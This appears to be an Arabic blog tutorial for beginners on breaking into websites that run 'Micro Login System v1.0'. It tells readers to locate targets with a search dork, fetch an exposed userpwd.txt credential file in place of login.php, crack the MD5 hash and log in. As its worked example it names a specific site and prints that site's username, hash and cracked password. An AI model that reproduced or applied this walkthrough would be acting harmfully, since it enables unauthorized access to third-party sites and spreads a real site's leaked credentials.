شرح ثغرة Micro Login System للإختراق المواقع المصابة بها
اليوم قررت ان افيدكم بثغرة قديـمة ولاكن فعالة
ادهب الىوتكتب الدورك
Micro Login System v 1.0
ومن هنا تعريف للدورك وماذا يقصد به
ستجد مواقع كثيرة
انا على سبيل المثال وجدت
http://www.rjonesprintanddisplay.com/ftp/login.php
rjonesprintanddisplay.com : نغيره بإسم الموقع المستهدف
ندخل عليه نجده يطلب يوزر ولوحة التحكم
طيب الان نحذف login.php
ونعوضها بـ userpwd.txt
http://www.rjonesprintanddisplay.com/ftp/userpwd.txt
تمام الان طلع لنا اليوزر و الباس على شكل هاش
user:alex
password:83e1ea39c9d3b1999c0bfe5b8bf1fd9a
طيب بقى لنا الان نفك الهاش سهلة
نفك الهاش من الموقع التالي
:
user : alexpassword : hellooo
الان نرجع الى
http://www.rjonesprintanddisplay.com/ftp/login.php
ونحط في اليوزر : alexوفي الباسورد : hellooo
هده تغرة للمبتدئين فقط و مبروك عليك المواقع و انتظروا الجديد ان شاء الله,وتذكرو دائما فهذه الثغرة ليست فعالة دائما.وليست مع كل المواقع سوى المواقع المصابة بهذه الثغرة فقط.
{[['
']]}
']]}
شرح ثغرة Micro Login System للإختراق المواقع المصابة بها
مراجعة MBARK T3STO
يوم
10:42 ص
التقييم:
مراجعة MBARK T3STO
يوم
10:42 ص
التقييم:
.jpg)
.png)
ليست هناك تعليقات: